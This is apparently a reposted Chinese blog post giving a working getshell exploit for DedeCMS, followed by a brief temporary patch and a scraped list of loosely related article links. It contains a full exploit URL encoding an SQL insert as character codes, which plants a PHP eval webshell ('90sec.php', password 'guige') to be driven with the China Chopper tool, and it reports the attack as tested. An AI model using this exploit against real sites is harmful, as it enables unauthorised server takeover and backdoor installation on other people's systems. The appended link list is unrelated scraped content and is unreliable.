构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`

EXP:

http://www.xxx.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96

成功增加。

访问http://www.xxx.org/plus/mytag_js.php?aid=9013
生成一句话***.
菜刀连接 http://www.xxx.org/plus/90sec.php  密码 guige

测试OK。

临时补丁:不知道别的地方还有没有覆盖变量 反正这个漏洞是修复的
include/dedesql.class.php

  1. if(isset($GLOBALS['arrs1']))

  2. {

  3. $v1 = $v2 = ”;

  4. for($i=0;isset($arrs1[$i]);$i++)

  5. {

  6. $v1 .= chr($arrs1[$i]);

  7. }

  8. for($i=0;isset($arrs2[$i]);$i++)

  9. {

  10. // $v2 .= chr($arrs2[$i]);  //注释这里

  11. }

  12. $GLOBALS[$v1] .= $v2;

  13. }

参考链接: http://dbo.pw/2013/06_13/165_html

转载于:https://blog.51cto.com/norman20000/1224518

dedecms漏洞getshell EXP最新可用相关推荐

  1. php漏洞可以过去root,phpdisk 漏洞发布 phpdisk header bypass getShell exp解析

    Author:Yaseng Team:CodePlay 1:代码审计 PHPDISK网盘系统是国内使用广泛PHP和MySQL构建的网络硬盘(文件存储管理)系统,笔者对其源码分析中,发现了一个很有意思的 ...

  2. dedecms 漏洞_dedescan一款织梦漏洞扫描器

    dedescan是一款可以扫描所有已公开的dedecms漏洞的扫描器. ... ... ... ... ... ... ... ... ... ... 用法:python3 dedescan.py 然 ...

  3. php批量getshell,getshell_phpcms2008 代码执行 批量getshell EXP(使用菜刀)_dedecms

    玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧 谷歌批量还需改进 一会儿会补上! 原文: http://www.wooyun.org/bug.php?action=vie ...

  4. dedecms漏洞组合拳拿站(渗透笔记)

    dedecms漏洞组合拳拿站(渗透笔记) 前言 之前也写过几篇关于dedecms漏洞复现的文章了,光是复现也没什么意思,于是利用google hacking技巧,找到了一个使用dede的站点,正好用上 ...

  5. 记某CMS漏洞getshell

    记极致CMS漏洞getshell 今天下午比较空闲,就去搜索一些cms,突然对极致CMS感兴趣,而网上已经有一些文章对它进行分析利用,sql注入,xss,后台修改上传后缀名前台getshell等等. ...

  6. 最新可用NOD32免ID升级服务器

    最新可用NOD32免ID升级服务器 最新可用NOD32免ID升级服务器 ,请参阅这里,我会保持可用,^_^! 上面的解决不了,下面的慢慢尝试吧! --===---------------------- ...

  7. 2022最新可用网页百度分享按钮安装教程【网站添加百度分享按钮代码】

    简介: 2022最新可用百度分享是一个提供网页地址收藏.分享及发送的WEB2.0按钮工具,借助百度分享按钮,网站的浏览者可以方便的分享内容到人人网.开心网.QQ空间.新浪微博等一系列SNS站点. 网站 ...

  8. 【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell

    文件包含漏洞的利用 读取敏感文件 我们可以利用文件包含漏洞读取任意文件,读取文件的时候有利用条件 目标主机文件存在(目标文件的路径.绝对路径.相对路径) 具有文件可读权限 提交参数http://loc ...

  9. 网课搜题公众号最新可用接口含搭建教程-麦麦题

    网课搜题公众号最新可用接口含搭建教程 第一步:需要注册一个公众号,如果有就直接下一步操作.没有的需要申请一个,个人注册订阅号,企业可以注册服务号. 公众号注册可以百度搜索微信公众平台进入注册,按照操作 ...

  10. Ubuntu 微信 linux版最新可用——UOS魔改版

    Ubuntu 微信 linux版最新可用--UOS魔改版 前言 去年,UOS发布了与微信合作的Wechat linux版本.虽然这只是一个网页套壳应用,但是好在能够使用,解决了基本的交流使用的问题.w ...

最新文章

  1. 深度学习面试必备的25个问题
  2. Hibernate.Annotation注解
  3. hdu 3652 B-number(数位DP)
  4. 敢不敢模拟超过 5 万的并发用户?
  5. Windows PowerShell:Windows PowerShell的简介、入门、使用方法之详细攻略
  6. Omni Recover for Mac版 - 一站式iPhone数据恢复
  7. 字节跳动正秘密研发手机 网友:字节锤子手机真来了?
  8. 安装Visio2010 64bit时提示不能安装32位版本的Office 2010 ,因为您当前已经安装了64位Office产品的解决方法(亲测可行)
  9. html5游戏打包apk,laya打包APK无法进入游戏
  10. 方案展示 | 基于全志A40i的激光喷码机解决方案
  11. 注册码生成器及加密程序
  12. theano java_Theano多个张量作为输出
  13. systemd 服务使用
  14. 远程为华为RH2288V3服务器安装vmware esxi5.1操作系统
  15. 深信服网络挑战赛初赛_2019
  16. 运维工作发展的几个阶段
  17. 阿里云商标顾问注册申请流程及常见问题解答
  18. html中怎么设置渐变颜色设置,css中渐变色怎么设置
  19. 园艺智慧_园艺日:如何在完全远程的情况下运行技术债务清理日
  20. linux hudson svn,Hudson Maven SVN快速搭建持续集成环境

热门文章

  1. iphone 直接中转到appstore
  2. 如何获得桌面上任意一个位置的颜色的 rgb 或者16进制值了
  3. ps提示“脚本错误-50出现一般Photoshop错误的解决方法
  4. Mac如何打开CAJ格式的文件?
  5. centos 7 重设密码总是失败
  6. blob类型对象转为file类型对象
  7. 少编码多思考:代码越多 问题越多
  8. Processing-基础小坑-
  9. PHP - 如何处理文件名乱码
  10. centos查找未挂载磁盘格式化并挂载